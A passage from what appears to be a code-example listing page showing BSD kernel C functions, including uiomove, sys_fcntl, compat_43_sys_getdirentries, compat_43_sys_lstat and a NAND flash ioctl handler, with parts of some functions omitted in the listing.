			continue;
		}

		if (uio->uio_segflg == UIO_SYSSPACE) {
			/* Kernel target: plain memory move, cannot fail. */
			result = 0;
			if (uio->uio_rw == UIO_READ) {
				memmove(iov->iov_kbase, ptr, chunk);
			}
			else {
				memmove(ptr, iov->iov_kbase, chunk);
			}
			iov->iov_kbase = ((char *)iov->iov_kbase+chunk);
		}
		else if (uio->uio_segflg == UIO_USERSPACE ||
		    uio->uio_segflg == UIO_USERISPACE) {
			/* User target: fault-safe copy, may fail. */
			if (uio->uio_rw == UIO_READ) {
				result = copyout(ptr, iov->iov_ubase, chunk);
			}
			else {
				result = copyin(iov->iov_ubase, ptr, chunk);
			}
			if (result) {
				return result;
			}
			iov->iov_ubase += chunk;
		}
		else {
			panic("uiomove: Invalid uio_segflg %d\n",
			    (int)uio->uio_segflg);
		}

		/* Account for the bytes just moved. */
		iov->iov_len -= chunk;
		uio->uio_resid -= chunk;
		uio->uio_offset += chunk;
		ptr = ((char *)ptr + chunk);
		n -= chunk;
	}

	return 0;
}
示例12: sys_fcntl
/*
 * The file control system call.
 */
int
sys_fcntl(struct lwp *l, const struct sys_fcntl_args *uap, register_t *retval)
{
	/* {
		syscallarg(int)		fd;
		syscallarg(int)		cmd;
		syscallarg(void *)	arg;
	} */
	int fd, i, tmp, error, cmd, newmin;
	filedesc_t *fdp;
	file_t *fp;
	struct flock fl;
	bool cloexec = false;

	fd = SCARG(uap, fd);
	cmd = SCARG(uap, cmd);
	fdp = l->l_fd;
	error = 0;

	/* Commands that do not need a held file_t are handled first. */
	switch (cmd) {
	case F_CLOSEM:
		/* Close every descriptor >= fd. */
		if (fd < 0)
			return EBADF;
		while ((i = fdp->fd_lastfile) >= fd) {
			if (fd_getfile(i) == NULL) {
				/* Another thread has updated. */
				continue;
			}
			fd_close(i);
		}
		return 0;

	case F_MAXFD:
		*retval = fdp->fd_lastfile;
		return 0;

	case F_SETLKW:
	case F_SETLK:
	case F_GETLK:
		/* POSIX advisory locking; flock struct round-trips via arg. */
		error = copyin(SCARG(uap, arg), &fl, sizeof(fl));
		if (error)
			return error;
		error = do_fcntl_lock(fd, cmd, &fl);
		if (cmd == F_GETLK && error == 0)
			error = copyout(&fl, SCARG(uap, arg), sizeof(fl));
		return error;

	default:
		/* Handled below */
		break;
	}

	if ((fp = fd_getfile(fd)) == NULL)
		return (EBADF);

	/* Filesystem-specific fcntl: delegate and release the file. */
	if ((cmd & F_FSCTL)) {
		error = fcntl_forfs(fd, fp, cmd, SCARG(uap, arg));
		fd_putfile(fd);
		return error;
	}

	switch (cmd) {
	case F_DUPFD_CLOEXEC:
		cloexec = true;
		/*FALLTHROUGH*/
	case F_DUPFD:
		newmin = (long)SCARG(uap, arg);
		/* Reject minimums beyond the per-process/system fd limits. */
		if ((u_int)newmin >=
		    l->l_proc->p_rlimit[RLIMIT_NOFILE].rlim_cur ||
		    (u_int)newmin >= maxfiles) {
			fd_putfile(fd);
			return EINVAL;
		}
		error = fd_dup(fp, newmin, &i, cloexec);
		*retval = i;
		break;

	case F_GETFD:
		*retval = fdp->fd_dt->dt_ff[fd]->ff_exclose;
		break;

	case F_SETFD:
		fd_set_exclose(l, fd,
		    ((long)SCARG(uap, arg) & FD_CLOEXEC) != 0);
		break;

	case F_GETNOSIGPIPE:
		*retval = (fp->f_flag & FNOSIGPIPE) != 0;
		break;

	case F_SETNOSIGPIPE:
		if (SCARG(uap, arg))
			atomic_or_uint(&fp->f_flag, FNOSIGPIPE);
		else
			atomic_and_uint(&fp->f_flag, ~FNOSIGPIPE);
		*retval = 0;
		break;
//......... remainder omitted in the original listing .........
示例13: compat_43_sys_getdirentries
//......... beginning of function omitted in the original listing .........
	VOP_UNLOCK(vp);
	if (error)
		goto out1;

	loff = fp->f_offset;
	nbytes = SCARG(uap, count);
	/* Read in multiples of the filesystem block size, capped at MAXBSIZE. */
	buflen = min(MAXBSIZE, nbytes);
	if (buflen < va.va_blocksize)
		buflen = va.va_blocksize;
	tbuf = malloc(buflen, M_TEMP, M_WAITOK);

	vn_lock(vp, LK_EXCLUSIVE | LK_RETRY);
	off = fp->f_offset;
again:
	/* Set up a kernel-space uio over the temporary buffer. */
	aiov.iov_base = tbuf;
	aiov.iov_len = buflen;
	auio.uio_iov = &aiov;
	auio.uio_iovcnt = 1;
	auio.uio_rw = UIO_READ;
	auio.uio_resid = buflen;
	auio.uio_offset = off;
	UIO_SETUP_SYSSPACE(&auio);
	/*
	 * First we read into the malloc'ed buffer, then
	 * we massage it into user space, one record at a time.
	 */
	error = VOP_READDIR(vp, &auio, fp->f_cred, &eofflag, &cookiebuf,
	    &ncookies);
	if (error)
		goto out;

	inp = (char *)tbuf;
	outp = SCARG(uap, buf);
	resid = nbytes;
	if ((len = buflen - auio.uio_resid) == 0)
		goto eof;

	for (cookie = cookiebuf; len > 0; len -= reclen) {
		bdp = (struct dirent *)inp;
		reclen = bdp->d_reclen;
		if (reclen & 3)
			panic(__func__);
		if (bdp->d_fileno == 0) {
			inp += reclen;	/* it is a hole; squish it out */
			if (cookie)
				off = *cookie++;
			else
				off += reclen;
			continue;
		}
		old_reclen = _DIRENT_RECLEN(&idb, bdp->d_namlen);
		if (reclen > len || resid < old_reclen) {
			/* entry too big for buffer, so just stop */
			outp++;
			break;
		}
		/*
		 * Massage in place to make a Dirent12-shaped dirent (otherwise
		 * we have to worry about touching user memory outside of
		 * the copyout() call).
		 */
		idb.d_fileno = (uint32_t)bdp->d_fileno;
		idb.d_reclen = (uint16_t)old_reclen;
		idb.d_namlen = (uint16_t)bdp->d_namlen;
		strcpy(idb.d_name, bdp->d_name);
		if ((error = copyout(&idb, outp, old_reclen)))
			goto out;
		/* advance past this real entry */
		inp += reclen;
		if (cookie)
			off = *cookie++; /* each entry points to itself */
		else
			off += reclen;
		/* advance output past Dirent12-shaped entry */
		outp += old_reclen;
		resid -= old_reclen;
	}

	/* if we squished out the whole block, try again */
	if (outp == SCARG(uap, buf)) {
		if (cookiebuf)
			free(cookiebuf, M_TEMP);
		cookiebuf = NULL;
		goto again;
	}
	fp->f_offset = off;	/* update the vnode offset */

eof:
	*retval = nbytes - resid;
out:
	VOP_UNLOCK(vp);
	if (cookiebuf)
		free(cookiebuf, M_TEMP);
	free(tbuf, M_TEMP);
out1:
	fd_putfile(SCARG(uap, fd));
	if (error)
		return error;
	/* Old ABI: report the starting offset through *basep. */
	return copyout(&loff, SCARG(uap, basep), sizeof(long));
}
示例14: compat_43_sys_lstat
/*
 * Old (4.3BSD-compat) lstat(2): stat a file without following a final
 * symbolic link, converting the result to the old struct stat43 layout.
 *
 * Historical quirk: for symlinks this reports the attributes of the
 * containing directory, except mode, size, link count and block count,
 * which come from the link itself.
 */
/* ARGSUSED */
int
compat_43_sys_lstat(struct lwp *l, const struct compat_43_sys_lstat_args *uap, register_t *retval)
{
	/* {
		syscallarg(char *) path;
		syscallarg(struct ostat *) ub;
	} */
	struct vnode *vp, *dvp;
	struct stat sb, sb1;
	struct stat43 osb;
	int error;
	struct pathbuf *pb;
	struct nameidata nd;
	int ndflags;

	error = pathbuf_copyin(SCARG(uap, path), &pb);
	if (error) {
		return error;
	}

	ndflags = NOFOLLOW | LOCKLEAF | LOCKPARENT | TRYEMULROOT;
again:
	NDINIT(&nd, LOOKUP, ndflags, pb);
	if ((error = namei(&nd))) {
		if (error == EISDIR && (ndflags & LOCKPARENT) != 0) {
			/*
			 * Should only happen on '/'. Retry without LOCKPARENT;
			 * this is safe since the vnode won't be a VLNK.
			 */
			ndflags &= ~LOCKPARENT;
			goto again;
		}
		pathbuf_destroy(pb);
		return (error);
	}
	/*
	 * For symbolic links, always return the attributes of its
	 * containing directory, except for mode, size, and links.
	 */
	vp = nd.ni_vp;
	dvp = nd.ni_dvp;
	pathbuf_destroy(pb);
	if (vp->v_type != VLNK) {
		/* Not a symlink: drop the parent reference/lock and stat vp. */
		if ((ndflags & LOCKPARENT) != 0) {
			if (dvp == vp)
				vrele(dvp);
			else
				vput(dvp);
		}
		error = vn_stat(vp, &sb);
		vput(vp);
		if (error)
			return (error);
	} else {
		/* Symlink: stat the parent, then merge link-specific fields. */
		error = vn_stat(dvp, &sb);
		vput(dvp);
		if (error) {
			vput(vp);
			return (error);
		}
		error = vn_stat(vp, &sb1);
		vput(vp);
		if (error)
			return (error);
		sb.st_mode &= ~S_IFDIR;
		sb.st_mode |= S_IFLNK;
		sb.st_nlink = sb1.st_nlink;
		sb.st_size = sb1.st_size;
		sb.st_blocks = sb1.st_blocks;
	}
	/* Convert to the old stat43 layout and copy out. */
	cvtstat(&sb, &osb);
	error = copyout((void *)&osb, (void *)SCARG(uap, ub), sizeof (osb));
	return (error);
}
示例15: nand_ioctl
/*
 * ioctl handler for the NAND flash character device: erase, OOB
 * read/program, status query and raw page read/program.
 *
 * Raw transfers are chunked through a bounce buffer of at most 16
 * pages (data + OOB) to bound kernel memory use.  Returns 0 or an
 * errno.  (The tail of this function is omitted in the original
 * listing.)
 */
static int
nand_ioctl(struct cdev *dev, u_long cmd, caddr_t data, int fflag,
    struct thread *td)
{
	struct nand_chip *chip;
	struct chip_geom *cg;
	struct nand_oob_rw *oob_rw = NULL;
	struct nand_raw_rw *raw_rw = NULL;
	device_t nandbus;
	size_t bufsize = 0, len = 0;
	size_t raw_size;
	off_t off;
	uint8_t *buf = NULL;
	int ret = 0;
	uint8_t status;

	chip = (struct nand_chip *)dev->si_drv1;
	cg = &chip->chip_geom;
	nandbus = device_get_parent(chip->dev);

	/* Common setup for the raw read/program commands. */
	if ((cmd == NAND_IO_RAW_READ) || (cmd == NAND_IO_RAW_PROG)) {
		raw_rw = (struct nand_raw_rw *)data;
		raw_size =  cg->pgs_per_blk * (cg->page_size + cg->oob_size);

		/* Check if len is not bigger than chip size */
		if (raw_rw->len > raw_size)
			return (EFBIG);

		/*
		 * Do not ask for too much memory, in case of large transfers
		 * read/write in 16-pages chunks
		 */
		bufsize = 16 * (cg->page_size + cg->oob_size);
		if (raw_rw->len < bufsize)
			bufsize = raw_rw->len;
		buf = malloc(bufsize, M_NAND, M_WAITOK);
		len = raw_rw->len;
		off = 0;
	}
	switch(cmd) {
	case NAND_IO_ERASE:
		/* data carries { start offset, length } as two off_t values. */
		ret = nand_erase_blocks(chip, ((off_t *)data)[0],
		    ((off_t *)data)[1]);
		break;

	case NAND_IO_OOB_READ:
		oob_rw = (struct nand_oob_rw *)data;
		ret = nand_oob_access(chip, oob_rw->page, 0,
		    oob_rw->len, oob_rw->data, 0);
		break;

	case NAND_IO_OOB_PROG:
		oob_rw = (struct nand_oob_rw *)data;
		ret = nand_oob_access(chip, oob_rw->page, 0,
		    oob_rw->len, oob_rw->data, 1);
		break;

	case NAND_IO_GET_STATUS:
		NANDBUS_LOCK(nandbus);
		ret = NANDBUS_GET_STATUS(nandbus, &status);
		if (ret == 0)
			*(uint8_t *)data = status;
		NANDBUS_UNLOCK(nandbus);
		break;

	case NAND_IO_RAW_PROG:
		/* Program in bounce-buffer-sized chunks: copyin, then write. */
		while (len > 0) {
			if (len < bufsize)
				bufsize = len;
			ret = copyin(raw_rw->data + off, buf, bufsize);
			if (ret)
				break;
			ret = nand_prog_pages_raw(chip, raw_rw->off + off, buf,
			    bufsize);
			if (ret)
				break;
			len -= bufsize;
			off += bufsize;
		}
		break;

	case NAND_IO_RAW_READ:
		/* Read in bounce-buffer-sized chunks: read, then copyout. */
		while (len > 0) {
			if (len < bufsize)
				bufsize = len;

			ret = nand_read_pages_raw(chip, raw_rw->off + off, buf,
			    bufsize);
			if (ret)
				break;

			ret = copyout(buf, raw_rw->data + off, bufsize);
			if (ret)
				break;
			len -= bufsize;
			off += bufsize;
		}
		break;
//......... remainder omitted in the original listing .........